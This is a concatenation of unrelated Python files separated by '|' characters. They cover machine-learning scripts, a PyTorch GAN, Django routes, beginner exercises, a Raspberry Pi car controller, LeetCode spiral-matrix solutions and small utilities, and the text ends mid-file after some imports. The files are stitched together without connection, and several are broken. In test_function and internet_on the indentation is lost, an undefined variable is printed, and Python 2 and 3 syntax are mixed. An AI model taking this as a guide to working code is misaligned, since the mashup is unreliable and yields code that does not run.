# Fit a two-feature linear regression: TF ~ Wqueen + Bqueen.
X = df[['Wqueen', 'Bqueen']]
y = df['TF']
regr = linear_model.LinearRegression()
regr.fit(X, y)
#
# #predict the CO2 emission of a car where the weight is 2300kg, and the volume is 1300cm3:
# NOTE(review): the comment above is stale (cars example); here the model
# predicts for Wqueen=42, Bqueen=15.
predictedprice = regr.predict([[42, 15]])
#
print(predictedprice) |
import pandas as pd
import numpy as np
# data file name
# CSV files expected in the working directory; X_* hold features, T_* labels.
x_train_name = 'X_train.csv'
y_train_name = 'T_train.csv'
x_test_name = 'X_test.csv'
y_test_name = 'T_test.csv'
def load_data():
    """
    Return the data as usual array type
    """
    features_train = pd.read_csv(x_train_name).values
    labels_train = pd.read_csv(y_train_name).values
    features_test = pd.read_csv(x_test_name).values
    labels_test = pd.read_csv(y_test_name).values
    # labels in the CSVs are 1-based; shift them to 0-based class indices
    return (features_train.astype(np.float32), labels_train - 1,
            features_test.astype(np.float32), labels_test - 1)
def shuffle(arr_x, arr_y):
    """Shuffle x and y with the same order.

    BUG FIX: the original did ``idx = np.random.shuffle(...)`` -- but
    np.random.shuffle shuffles in place and returns None, so ``idx`` was
    None and ``arr_x[idx]`` silently produced a wrongly-shaped array
    instead of a shuffled one.  Use a permutation of the indices instead.
    """
    idx = np.random.permutation(len(arr_x))
    return arr_x[idx], arr_y[idx]
def to_svm_format(arr_x, arr_y):
    """Convert feature rows and label rows to LIBSVM-style lists.

    Each feature row becomes a {1-based column index: value} dict; each
    label row contributes its first element.
    """
    feature_dicts = [
        {col + 1: value for col, value in enumerate(row)}
        for row in arr_x
    ]
    labels = [row[0] for row in arr_y]
    return feature_dicts, labels
def to_svm_file(list_x, list_y, file_name='train.txt'):
    """Write LIBSVM-formatted lines ("label idx:val idx:val ... \\n") to file_name."""
    lines = []
    for label, feature_dict in zip(list_y, list_x):
        # one token per feature, joined with single spaces; note the original
        # format carries a trailing space before the newline -- preserved here
        parts = [str(label)] + ['%s:%s' % (k, v) for k, v in feature_dict.items()]
        lines.append(' '.join(parts) + ' \n')
    with open(file_name, 'w') as f:
        f.writelines(lines)
if __name__ == '__main__':
    # smoke test: load the CSVs and show the training set's shape and first row
    x_train, y_train, x_test, y_test = load_data()
    print(np.shape(x_train))
    print(x_train[0])
print(y_train[0]) |
import torch
import torch.nn as nn
import torch.nn.functional
from torch.nn import init
from collections import OrderedDict
import numpy as np
class LinearBottleneck(nn.Module):
    """MobileNetV2-style inverted residual block.

    A pointwise conv expands channels by factor ``t``, a depthwise conv does
    the spatial work, and a final pointwise conv projects down to
    ``outplanes``; each conv is followed by BatchNorm and (for the first two)
    the activation.  A residual shortcut is added when the shape is unchanged
    (stride 1 and inplanes == outplanes).
    """

    def __init__(self, inplanes, outplanes, stride, t, activation=nn.ReLU6,
                 kernel_size=[3, 3], padding=1):
        '''
        :param inplanes: input channel count
        :param outplanes: output channel count
        :param stride: stride of the depthwise conv
        :param t: channel expansion factor
        :param activation: activation module class (must accept inplace=)
        '''
        super(LinearBottleneck, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, t * inplanes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(inplanes * t)
        self.conv2 = nn.Conv2d(inplanes * t, inplanes * t, kernel_size=kernel_size,
                               stride=stride, padding=padding, bias=False,
                               groups=t * inplanes)
        self.bn2 = nn.BatchNorm2d(inplanes * t)
        # BUG FIX: the projection conv hard-coded an expansion factor of 6
        # (inplanes*6); it must consume the inplanes*t channels produced by
        # conv2, otherwise any t != 6 crashes with a channel mismatch.
        self.conv3 = nn.Conv2d(inplanes * t, outplanes, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(outplanes)
        self.activation = activation(inplace=True)
        self.inplanes = inplanes
        self.outplanes = outplanes
        self.stride = stride

    def forward(self, x):
        residual = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.activation(out)
        out = self.conv2(out)
        out = self.bn2(out)
        out = self.activation(out)
        out = self.conv3(out)
        out = self.bn3(out)
        # no activation after the projection: the "linear" bottleneck
        if self.stride == 1 and self.inplanes == self.outplanes:
            out = out + residual
        return out
class SPP(nn.Module):
    """Spatial pyramid pooling: average-pool at three scales, reduce each to
    in_channels // 3 channels, upsample back to the input size, and
    concatenate with the input.

    Output channel count is in_channels + 3 * (in_channels // 3).
    """

    def __init__(self, in_channels):
        nn.Module.__init__(self)
        # FIX: removed a stray "x1 =" alias left over from a forward() draft;
        # it served no purpose in __init__.
        self.pool1 = nn.AvgPool2d([16, 16])
        self.pool2 = nn.AvgPool2d([8, 8])
        self.pool3 = nn.AvgPool2d([2, 2])
        # each scale: depthwise 1x1 conv, then a pointwise reduction to C//3
        self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False,
                               groups=in_channels)
        self.conv2 = nn.Conv2d(in_channels, in_channels // 3, kernel_size=1, bias=False)
        self.conv3 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False,
                               groups=in_channels)
        self.conv4 = nn.Conv2d(in_channels, in_channels // 3, kernel_size=1, bias=False)
        self.conv5 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False,
                               groups=in_channels)
        self.conv6 = nn.Conv2d(in_channels, in_channels // 3, kernel_size=1, bias=False)

    def forward(self, x):
        x_size = x.size()[2:]
        out = x
        x1 = self.pool1(x)
        x2 = self.pool2(x)
        x3 = self.pool3(x)
        x1 = self.conv1(x1)
        x1 = self.conv2(x1)
        x2 = self.conv3(x2)
        x2 = self.conv4(x2)
        x3 = self.conv5(x3)
        x3 = self.conv6(x3)
        # upsample every scale back to the input's spatial size
        x1 = nn.functional.interpolate(x1, size=x_size, mode='bilinear', align_corners=True)
        x2 = nn.functional.interpolate(x2, size=x_size, mode='bilinear', align_corners=True)
        x3 = nn.functional.interpolate(x3, size=x_size, mode='bilinear', align_corners=True)
        x4 = torch.cat([x1, x2, x3, out], 1)
        return x4
base = {'352': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512]}
def vgg16(cfg, inchannels, batch_norm=False):
    """Build a VGG16-like layer list where each conv stage is a LinearBottleneck.

    'M' entries become 2x2 max-pools; integer entries are output channel counts.
    """
    layers = []
    channels = inchannels
    for spec in cfg:
        if spec == 'M':
            layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
            continue
        bottleneck = LinearBottleneck(channels, spec, stride=1, t=6)
        if batch_norm:
            layers.extend([bottleneck, nn.BatchNorm2d(spec), nn.ReLU(inplace=True)])
        else:
            layers.extend([bottleneck, nn.ReLU(inplace=True)])
        channels = spec
    return layers
class LANet(nn.Module):  # acts as the generator
    """Saliency generator: bottleneck-VGG encoder + SPP + 1x1 head, upsampled x16.

    NOTE(review): the default arguments construct shared module instances at
    definition time -- every LANet() built with defaults shares the same
    vgg/spp weights; confirm this is intended.
    """

    def __init__(self, vgg=vgg16(base['352'], 3), spp=SPP(512)):
        nn.Module.__init__(self)
        self.vgg = nn.ModuleList(vgg)
        self.spp = spp
        # the SPP concat yields 512 + 3*(512//3) = 1022 channels
        self.conv = LinearBottleneck(1022, 512, 1, 6)
        self.convLast = LinearBottleneck(512, 1, 1, 6)

    def forward(self, x):
        for layer in self.vgg:
            x = layer(x)
        x = self.spp(x)
        x = self.conv(x)
        x = self.convLast(x)
        # decoder: bring the 1-channel map back up to input resolution
        return nn.functional.interpolate(x, scale_factor=16)
class Discriminate(nn.Module):
    """Discriminator over an (image, mask) pair -> probability in (0, 1).

    FIXES vs. the original:
      * now inherits nn.Module -- the original called super().__init__() on a
        plain class, so submodules were never registered and the network was
        unusable as a torch module;
      * np.prod was called as np.prod(32, 32, 128), an invalid signature; it
        takes a single shape tuple;
      * the conv feature map is flattened before the fully-connected head
        (the original fed a 4-D tensor straight into nn.Linear).
    The fc input size (32*32*128) assumes 128x128 inputs (two stride-2 stages).
    """

    def __init__(self):
        super(Discriminate, self).__init__()
        self.linearBottleneck1 = LinearBottleneck(3, 32, stride=1, t=6, padding=2, kernel_size=[5, 5])
        self.linearBottleneck2 = LinearBottleneck(32, 32, stride=1, t=6, padding=2, kernel_size=[5, 5])
        self.linearBottleneck3 = LinearBottleneck(1, 32, stride=1, t=6, padding=2, kernel_size=[5, 5])
        self.linearBottleneck4 = LinearBottleneck(64, 64, stride=1, t=6, padding=1, kernel_size=[3, 3])
        self.linearBottleneck5 = LinearBottleneck(64, 64, stride=2, t=6, padding=1, kernel_size=[3, 3])
        self.linearBottleneck6 = LinearBottleneck(64, 128, stride=2, t=6, padding=1, kernel_size=[3, 3])
        # NOTE(review): linearBottleneck7 is defined but never used in forward(),
        # exactly as in the original -- confirm whether it should be applied.
        self.linearBottleneck7 = LinearBottleneck(128, 128, stride=2, t=6, padding=1, kernel_size=[3, 3])
        self.fc = nn.Sequential(
            nn.Linear(int(np.prod((32, 32, 128))), 512),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Linear(512, 256),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Linear(256, 1),
            nn.Sigmoid(),
        )

    def forward(self, img, mask):
        x1 = self.linearBottleneck1(img)
        x1 = self.linearBottleneck2(x1)
        x2 = self.linearBottleneck3(mask)
        # fuse image and mask feature maps along the channel axis
        x3 = torch.cat([x1, x2], 1)
        x3 = self.linearBottleneck4(x3)
        x3 = self.linearBottleneck5(x3)
        x3 = self.linearBottleneck6(x3)
        x3 = x3.view(x3.size(0), -1)  # flatten for the linear head
        x3 = self.fc(x3)
        return x3
def xavier(param):
    # Xavier/Glorot uniform initialisation.
    init.xavier_uniform_(param)

def weights_init(m):
    """Apply xavier init to Conv2d weights and zero the bias when present.

    BUG FIX: the convs in this file are built with bias=False, so m.bias is
    None and the original unconditionally called m.bias.data.zero_(),
    raising AttributeError; guard against a missing bias.
    """
    if isinstance(m, nn.Conv2d):
        xavier(m.weight.data)
        if m.bias is not None:
            m.bias.data.zero_()
|
"""Runs the dialog pipeline by having creating a dialog agent and having it
engage in a conversation with a user through terminal.
"""
from __future__ import absolute_import
import logging
from dialog.argument_parser import dialog_arguments_parser
from dialog.configs import DialogConfiguration
from dialog.dialog_agent import DialogAgent
from dialog.dialog_policy import DialogPolicy
from dialog.dialog_state import DialogState
from dialog.input_output import Input, Output
from dialog.label_description import LabelDescription
from dialog.intention import Intention
from dialog.utterance_parser import UtteranceParser
from parser.action_channel_model import ActionChannelModel
from parser.action_function_model import ActionFunctionModel
from parser.combined_model import CombinedModel
from parser.keyword_model import KeywordModel
from parser.trigger_function_model import TriggerFunctionModel
from parser.trigger_channel_model import TriggerChannelModel
from tracker.dialog_tracker import DialogTracker
def parse_arguments():
    """Parse CLI args, configure logging, and store alpha/beta on DialogConfiguration."""
    args = dialog_arguments_parser().parse_args()
    logging.basicConfig(level=getattr(logging, args.log_level.upper()),
                        format='%(levelname)s: %(asctime)s: %(message)s')
    # policy thresholds: alpha must dominate beta
    assert(args.alpha >= args.beta)
    DialogConfiguration.alpha = args.alpha
    DialogConfiguration.beta = args.beta
def load_trigger_channel_parser():
    # Ensemble over the trigger-channel model configurations.
    args = CombinedModel.t_channel_args
    return CombinedModel.create_ensemble(args, TriggerChannelModel)

def load_action_channel_parser():
    # Ensemble over the action-channel model configurations.
    args = CombinedModel.a_channel_args
    return CombinedModel.create_ensemble(args, ActionChannelModel)

def load_trigger_fn_parser():
    # Ensemble over the trigger-function model configurations.
    args = CombinedModel.t_fn_args
    return CombinedModel.create_ensemble(args, TriggerFunctionModel)

def load_action_fn_parser():
    # Ensemble over the action-function model configurations.
    args = CombinedModel.a_fn_args
    return CombinedModel.create_ensemble(args, ActionFunctionModel)

def load_keyword_parser():
    # Keyword model needs no ensemble setup.
    return KeywordModel()

def load_parsers():
    """Load all five parser models; returned tuple order is fixed and relied on by main()."""
    logging.debug("Loading parsers.")
    trigger_channel_parser = load_trigger_channel_parser()
    action_channel_parser = load_action_channel_parser()
    trigger_fn_parser = load_trigger_fn_parser()
    action_fn_parser = load_action_fn_parser()
    keyword_parser = load_keyword_parser()
    logging.info("All parsers loaded.")
    return (trigger_channel_parser, action_channel_parser, trigger_fn_parser,
            action_fn_parser, keyword_parser)
def create_dialog_agent(trigger_channel_parser, action_channel_parser,
                        trigger_fn_parser, action_fn_parser, keyword_parser,
                        istream, ostream):
    """Wire the parsers, policy, state and tracker into a fresh DialogAgent.

    The parser models are reused across sessions; everything else
    (state, tracker, streams) is constructed per call.
    """
    logging.info("Initializing dialog agent.")
    label_description = LabelDescription()
    parser = UtteranceParser(trigger_channel_model=trigger_channel_parser,
                             action_channel_model=action_channel_parser,
                             trigger_fn_model=trigger_fn_parser,
                             action_fn_model=action_fn_parser,
                             keyword_model=keyword_parser,
                             label_description=label_description)
    # Intention is passed as the class itself, not an instance.
    intention = Intention
    dialog_policy = DialogPolicy(DialogConfiguration)
    dialog_state = DialogState()
    tracker = DialogTracker()
    dialog_agent = DialogAgent(state=dialog_state, policy=dialog_policy,
                               parser=parser, intention=intention,
                               label_description=label_description,
                               istream=istream, ostream=ostream,
                               tracker=tracker)
    return dialog_agent
def main():
    """Load models once, then serve terminal dialog sessions forever."""
    parse_arguments()
    t_channel_parser, a_channel_parser, t_fn_parser, a_fn_parser, \
        keyword_parser = load_parsers()
    # one fresh agent (and dialog state) per session; models are reused
    while True:
        dialog_agent = create_dialog_agent(
            trigger_channel_parser=t_channel_parser,
            trigger_fn_parser=t_fn_parser,
            action_channel_parser=a_channel_parser,
            action_fn_parser=a_fn_parser,
            keyword_parser=keyword_parser, istream=Input(), ostream=Output())
        dialog_agent.start_session()

if __name__ == '__main__':
    main()
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
    # polls landing page (response text is intentionally Chinese)
    return HttpResponse("polls的首页")

def detail(request, question_id):
    # detail page for one question
    return HttpResponse("你正在看question {},的详细页".format(question_id))

def results(request, question_id):
    # vote results for one question
    return HttpResponse("你在看问题{}的投票结果".format(question_id))

def vote(request, question_id):
    # cast a vote on one question
    return HttpResponse("你在给问题{}投票".format(question_id))
|
def sum(p):
    """Return 1 + 2 + ... + p, counting while the term is still <= p.

    NOTE: shadows the builtin sum(); the name is kept for the callers below.
    """
    total = 0
    term = 1
    while term <= p:
        total += term
        term += 1
    return total
print(sum(10))
print(sum(11))
print(sum(12))
# File: exercise0803.py
# Author: Kaiching Chang
# Date: July, 2014
|
# Teaching script: for-loops over list, tuple and dict (Korean output strings).
count = [0, 1, 2, 3]
for num in count:
    print("num = %d"%num)
count = ["one", "two", "three", "four", "five"]
for i in count:
    print(i)
# iterable => objects you can loop over => list, tuple, dict
# num = 10
# for i in num:
#     print(i)
# tuple: pass/fail per student score
jumsu = (90, 50, 60, 80, 40)
number = 1
for i in jumsu:
    if i >= 60:
        print("%d번째 학생 : 합격"%number)
    else:
        print("%d번째 학생 : 불합격"%number)
    number += 1
people = {"송새봄":29, "송여름":16, "송가을":32, "송겨울":5}
minor = []
adult = []
# iterating a dict yields only its keys!
for i in people:
    if people[i] < 20:
        print("%s님 : %d살 ==> 미성년자"%(i, people[i]))
        minor.append(i)
    else:
        print("%s님 : %d살 ==> 성인"%(i, people[i]))
        adult.append(i)
print("성인 : %s"%adult)
print("미성년자 : %s"%minor)
|
def factorial(n):
    """Recursively compute n!, printing an indented trace of every call."""
    indent = ' ' * (4 * n)
    print (indent, 'factorial', n)
    if n == 0:
        # base case
        print (indent, 'returning 1')
        return 1
    rest = factorial(n-1)
    product = n * rest
    print (indent, 'returning', product)
    return product
factorial(5)
def b(z):
    """Print z and a(z, z), then return a(z, z)."""
    prod = a(z, z)
    print (z, prod)
    return prod

def a(x, y):
    """Return (x + 1) * y; the increment only ever touched the local x."""
    return (x + 1) * y

def c(x, y, z):
    """Return the square of b applied to the sum of the arguments."""
    return b(x + y + z) ** 2

x = 1
y = x + 1
print(c(x, y+3, x+y))
def test_function( length, width, height):
print ("the area of the box is ", length*width*height)
return length*width*height
l = 12.5
w = 5
h = 2
test_function(l, w, h)
print ("The area of the box is ", length*width*height)
|
from django.conf.urls import url
from . import views
# Authentication / profile routes for the app's views module.
urlpatterns = [
    url(r'^house/$', views.user_profile, name='user_profile'),
    url(r'^login/$', views.user_login, name='user_login'),
    url(r'^demo-login/$', views.demo_login, name='demo_login'),
    url(r'^logout/$', views.user_logout, name='user_logout'),
    url(r'^register/$', views.register_user, name='register_user'),
] |
import requests
import cognitive
mic_device = "plughw:1"
cognize = None
# Check whether your Raspberry Pi is connected to the internet
def internet_on():
print "Checking Internet Connection"
try:
r = requests.get('http://iamawesome.com')
print "All systems GO"
return True
except:
print "Connection Failed"
return False
def init():
global cognize
cognize = cognitive.doit
|
import android
import sqlite3
import datetime
droid = android.Android()
# Fields of the received SMS, exposed via the SL4A intent extras.
textFrom = droid.getIntent().result['%SMSRF']  # sender number
textName = droid.getIntent().result['%SMSRN']  # sender name
textBody = droid.getIntent().result['%SMSRB']  # message body
# BUG FIX: isoformat() is an instance method; the original called it on the
# date class itself (TypeError). Use today's date.
textDate = datetime.date.today().isoformat()
textTime = droid.getIntent().result['%SMSRT']  # receive time
conn = sqlite3.connect('/sdcard/MyRec/MyRec.db')
cur = conn.cursor()
# BUG FIX: the original embedded the variable *names* inside the SQL string
# literal (and was missing the closing parenthesis of execute()). Use a
# parameterized query, then commit so the row is actually persisted.
cur.execute(
    "INSERT INTO TextMessages([date], [time], inout, sender, sender_name, msg) "
    "VALUES (?, ?, ?, ?, ?, ?)",
    (textDate, textTime, 'in', textFrom, textName, textBody),
)
conn.commit()
conn.close()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
Exercise: copy the contents of one list into another list.
"""
a = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print(a)
b = a            # alias: b and a refer to the SAME list object
print(b)
c = a[:]         # slice copy: c is an independent list
# BUG FIX: the original printed b again here, defeating the point of the
# copy demonstration; print the copy c instead.
print(c)
a.reverse()      # mutates a in place; the alias b sees it, the copy c does not
print(a)
|
import pygame
import pygame.camera
from pygame.locals import *
from datetime import datetime
import cv2
from BluetoothCom import BluetoothComm
# Steering angle must be from -180 to 180
# to small current anle
# capsule net
# fine tuning
# V4L2 camera device and capture resolution.
DEVICE = '/dev/video0'
SIZE = (640, 480)
# Output directory for captured frames.
FOLDER = 'GroundFloor6/'
# MAC address of the Bluetooth steering controller.
serverMACAddress = '00:15:83:35:99:09'
# NOTE(review): second argument presumably a server/client flag — confirm in BluetoothCom.
bluetoothServer = BluetoothComm(serverMACAddress, False)
def preprocess(img):
    """Rotate, crop and shrink a camera frame for the steering model.

    Returns a 32x16 image (cv2.resize takes (width, height)).
    """
    rows, cols, _ = img.shape
    # Rotate -90 degrees about the centre at 1.4x scale — presumably to undo
    # the camera mounting orientation (TODO confirm).
    M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -90, 1.4)
    dst = cv2.warpAffine(img, M, (cols, rows), flags=cv2.INTER_AREA)
    # Drop the top 59 rows and the last row before resizing.
    crop_img = dst[59:-1, :]
    x = cv2.resize(crop_img, (32, 16))
    return x
def camstream():
    """Main loop: capture frames, predict a steering angle with a Keras
    model, stream 'a'-prefixed angle commands over Bluetooth, and let a
    joystick send speed commands / stop recording. (Python 2 syntax: note
    the bare `print leftright` statement below.)
    """
    # initialising pygame display
    pygame.init()
    display = pygame.display.set_mode(SIZE, 0)
    # initialising camera
    pygame.camera.init()
    camera = pygame.camera.Camera(DEVICE, SIZE)
    camera.start()
    # initialising joystick
    pygame.joystick.init()
    joystick = pygame.joystick.Joystick(0)
    joystick.init()
    joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
    print(joysticks)
    from keras.models import load_model
    # NOTE(review): load_model is handed a .json path; Keras load_model
    # expects a saved model file (e.g. .h5) — confirm this file really is one.
    model = load_model('../model_small.json')
    # Used to manage how fast the screen updates
    clock = pygame.time.Clock()
    screen = pygame.surface.Surface(SIZE, 0, display)
    capture = True
    recording = False
    x = 0
    y = 0
    while capture:
        # Grab a frame, display it, and write it to disk so cv2 can re-read it.
        screen = camera.get_image(screen)
        display.blit(screen, (0, 0))
        pygame.display.flip()
        l = FOLDER + str(datetime.now()) + "--" + "s1" + "--" + "s1" + ".jpg"
        pygame.image.save(screen, l)
        img = cv2.imread(l)
        img = preprocess(img)
        # Negate the model output, then map [-0.2, 0.2] onto a 0-180 angle.
        leftright = -round(model.predict(img[None,:,:,:])[0][0],4)
        print ("predicted: " + str(leftright))
        leftright = int(translate(leftright, -0.2, 0.2, 0, 180))
        print leftright
        angleInfo = 'a' + formatAngle(leftright)
        bluetoothServer.send(angleInfo)
        for event in pygame.event.get():
            # Joystick override: axis 0 steers; buttons 0/2 pick the speed command.
            lf = -joystick.get_axis(0)
            leftright = int(translate(lf, -1, 1, 0, 180))
            angleInfo = 'a' + formatAngle(leftright)
            # speedInfo = 's' + formatSpeed(updown)
            a = joystick.get_button(0)
            b = joystick.get_button(2)
            x = ''
            if (a == 1):
                x = 's1'
            elif (b == 1):
                x = 's2'
            else:
                x = 's3'
            # bluetoothServer.send(angleInfo)
            bluetoothServer.send(x)
            if event.type == QUIT:
                capture = False
            # i:0 -> 1
            # i:1 -> 2
            # i:2 -> 3
            # i:3 -> 4
            # i:4 -> L1
            # i:5 -> R1
            # i:6 -> L2
            # i:7 -> R2
            if event.type == pygame.JOYBUTTONDOWN:
                if joystick.get_button(5) == 1:
                    # R1
                    recording = True
                    print("recording status : " + str(recording))
                if joystick.get_button(7) == 1:
                    # R2
                    recording = False
                    print("recording status : " + str(recording))
                if joystick.get_button(4) == 1 or joystick.get_button(6) == 1:
                    # L1 or L2
                    recording = False
                    bluetoothServer.send("s3")
                    print ("Stoping car and recording")
        clock.tick(60)
    camera.stop()
    pygame.quit()
    return
def saveImage(img, event_angle, updown, recording):
    """Persist a frame under FOLDER, named with timestamp, angle and speed tag."""
    filename = FOLDER + str(datetime.now()) + "--" + str(event_angle) + "--" + str(updown) + ".jpg"
    pygame.image.save(img, filename)
def formatAngle(x):
    """Return str(x), left-padded with '0' to at least three characters."""
    text = str(x)
    while len(text) < 3:
        text = '0' + text
    return text
def formatSpeed(x):
    """Map a joystick axis value to a drive-command digit string.

    negative -> '2' (back), positive -> '1' (forward), zero -> '3' (stop).
    """
    if x > 0:
        return '1'
    if x < 0:
        return '2'
    return '3'
def translate(value, leftMin, leftMax, rightMin, rightMax):
    """Linearly map `value` from [leftMin, leftMax] onto [rightMin, rightMax]."""
    # Normalise to a 0-1 fraction of the source range, then scale.
    fraction = float(value - leftMin) / float(leftMax - leftMin)
    return rightMin + fraction * (rightMax - rightMin)
# Entry point: start the camera/joystick control loop.
if __name__ == '__main__':
    camstream()
|
"""
Given an m x n matrix, return all elements of the matrix in spiral order.
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [1,2,3,6,9,8,7,4,5]
Input: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
Output: [1,2,3,4,8,12,11,10,9,5,6,7]
"""
from typing import List
class Solution:
    """Spiral-order traversal using a shrinking window and a phase counter.

    k % 4 selects the side currently being consumed:
    0 = top row (left->right), 1 = right column (top->bottom),
    2 = bottom row (right->left), 3 = left column (bottom->top).
    FIX: removed leftover debug print() calls that polluted stdout.
    """
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        start = 0
        vend = len(matrix[0]) - 1   # last column index
        hend = len(matrix) - 1      # last row index
        k = 0
        out = []
        while start <= hend:
            if vend >= start and k % 4 == 0:
                for i in range(start, vend + 1):
                    out.append(matrix[start][i])
                k = k + 1
            if hend > start and k % 4 == 1:
                for i in range(start + 1, hend + 1):
                    out.append(matrix[i][vend])
                k = k + 1
            if vend > start and k % 4 == 2:
                for i in range(vend - 1, start - 1, -1):
                    out.append(matrix[hend][i])
                k = k + 1
            if hend >= start and k % 4 == 3:
                for i in range(hend - 1, start, -1):
                    out.append(matrix[i][start])
                k = k + 1
            start = start + 1
            vend = vend - 1
            hend = hend - 1
        return out
class Solution2:
    """Spiral-order traversal delegating to the recursive helper
    spiral_traverse_matrix (direction cycle R -> D -> L -> U)."""
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        # BUG FIX: guard the empty cases *before* touching matrix[0], and
        # return an empty list (matching the declared return type) instead
        # of None.
        if not matrix or not matrix[0]:
            return []
        start_row = 0
        start_col = 0
        end_row = len(matrix) - 1
        end_col = len(matrix[0]) - 1
        movement = ['R', 'D', 'L', 'U']
        out = []
        spiral_traverse_matrix(matrix, 0, start_row, start_col, end_row, end_col, out, movement)
        return out
def spiral_traverse_matrix(matrix, index, start_row, start_col, end_row, end_col, out, movement):
    """Append one side of the current window to `out`, then recurse.

    movement[index % 4] names the side: 'R' = top row left->right,
    'D' = right column top->bottom, 'L' = bottom row right->left,
    'U' = left column bottom->top. Each step shrinks the window by the
    edge it just consumed; recursion stops when the window is empty.
    FIX: removed leftover debug print() calls that polluted stdout.
    """
    if end_row < 0 or end_col < 0:
        return
    if start_row > end_row or start_col > end_col:
        return
    op = movement[index % len(movement)]
    if op == 'R':
        for i in range(start_col, end_col + 1):
            out.append(matrix[start_row][i])
        return spiral_traverse_matrix(matrix, index + 1, start_row + 1, start_col, end_row, end_col, out, movement)
    elif op == 'D':
        for i in range(start_row, end_row + 1):
            out.append(matrix[i][end_col])
        return spiral_traverse_matrix(matrix, index + 1, start_row, start_col, end_row, end_col - 1, out, movement)
    elif op == 'L':
        for i in range(end_col, start_col - 1, -1):
            out.append(matrix[end_row][i])
        return spiral_traverse_matrix(matrix, index + 1, start_row, start_col, end_row - 1, end_col, out, movement)
    elif op == 'U':
        for i in range(end_row, start_row - 1, -1):
            out.append(matrix[i][start_col])
        return spiral_traverse_matrix(matrix, index + 1, start_row, start_col + 1, end_row, end_col, out, movement)
# Demo runs against the two examples from the problem statement.
matrix = [[1,2,3],[4,5,6],[7,8,9]]
print ("Input : {}".format(matrix))
ans = Solution().spiralOrder(matrix)
print ("Solution : {}".format(ans))
matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
print ("Input : {}".format(matrix))
ans = Solution().spiralOrder(matrix)
print ("Solution : {}".format(ans))
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
from aiokafka import TopicPartition
from tonga.models.records.event.event import BaseEvent
from tonga.models.handlers.event.event_handler import BaseEventHandler
from typing import Union
__all__ = [
'TestEventHandler'
]
class TestEventHandler(BaseEventHandler):
    """Placeholder event handler registered under 'tonga.test.event'."""
    def __init__(self) -> None:
        # No state to initialise.
        pass
    @classmethod
    def handler_name(cls) -> str:
        # Event name this handler answers to.
        return 'tonga.test.event'
    async def handle(self, event: BaseEvent, tp: TopicPartition, group_id: str, offset: int) -> Union[str, None]:
        # Intentionally unimplemented — NOTE(review): presumably only
        # registration/dispatch is exercised by tests; confirm.
        raise NotImplementedError
|
def result(scores):
    """Judge a round from the three middle values of a sorted score list.

    Returns "KIN" when the spread of those three values is at least 4,
    otherwise their sum.
    """
    middle = scores[1:4]
    spread = middle[-1] - middle[0]
    return "KIN" if spread >= 4 else sum(middle)
# One line of input per test case: the scores are sorted before judging.
for _ in range(int(input())):
    scores = sorted(list(map(int, input().split())))
    print(result(scores))
|
# Sum the integers 1..50.
# FIX: the original accumulated into a variable named `sum`, shadowing the
# builtin; use the builtin over a range instead (same printed output).
total = sum(range(1, 51))
print("sum is:", total)
import pandas as pd
from textblob import TextBlob
# Score each review sentence with TextBlob sentiment polarity and save the
# scores alongside the identifying columns.
data = pd.read_csv('/Users/enyaning/Desktop/BIA660/BIA660_TEAM_2/test.csv')
arr = []
for index, row in data.iterrows():
    # NOTE(review): assumes each row's 'sentence' field parses to at least
    # one sentence (blob.sentences[0] otherwise raises IndexError) — confirm.
    blob = TextBlob(row['sentence'])
    arr.append({
        'phrase': row['phrase'],
        'polarity': blob.sentences[0].sentiment.polarity,
        'restaurantId': row['restaurantId'],
        'review_id': row['review_id'],
        'sentence_id': row['sentence_id'],
        'sentence': row['sentence']
    })
df = pd.DataFrame(arr)
df.to_csv('test_polarity.csv')
|
from PyQt4 import QtCore, QtGui, uic
class dropdown(QtGui.QDialog):
    """Dialog wrapping a combo box loaded from drop_down.ui."""
    def reto(self):
        # Current combo-box selection (also wired to the 'activated' signal).
        return self.comboBox.currentText()
    def __init__(self,lista):
        QtGui.QDialog.__init__(self)
        uic.loadUi("drop_down.ui",self)
        self.comboBox.addItems(lista)
        # NOTE(review): connecting 'activated' to reto discards reto's return
        # value; callers must invoke reto() themselves to read the choice.
        self.comboBox.activated.connect(self.reto)
from django.urls import path, include
from django.conf.urls.static import static
from . import views
# Site page routes; every view lives in this app's views module.
urlpatterns = [
    path('', views.homepage, name='homepage'),
    path('index', views.homepage, name='homepage'),  # same view, alternate URL
    path('publications', views.publications, name='publications'),
    path('alumni', views.alumni, name='alumni'),
    path('contact', views.contact, name='contact'),
    path('joinus', views.positionsjoin, name='joinus'),
    path('phd_students', views.phdstudents, name='phdstudents'),
    path('pi', views.pi, name='pi'),
    path('project1', views.project1, name='project1'),
    path('result', views.result, name='result'),
    path('research', views.research, name='research'),
    path('researchers',views.researchers, name='researchers'),
    path('shiladit', views.shiladit, name='shiladit'),
    path('students', views.students, name='students'),
    # NOTE(review): 'team' reuses the students view — confirm intentional.
    path('team', views.students, name='team'),
]
|
#!/usr/local/bin/python
import sys
import random
import pygame
from pygame.locals import *
from src.cdp.Personagens import Personagem
from src.cih import Impressao
from src.cih import JanelaMenu
from src.util.Build import (NavePerdidaBuilder, NaveFugaBuilder, NaveGrupoBuilder,
NavePeaoBuilder, NavePersegueBuilder, NaveJogadorBuilder)
# -------------------------------------------------------------------------------
# Name: Nave Maluca 2.1
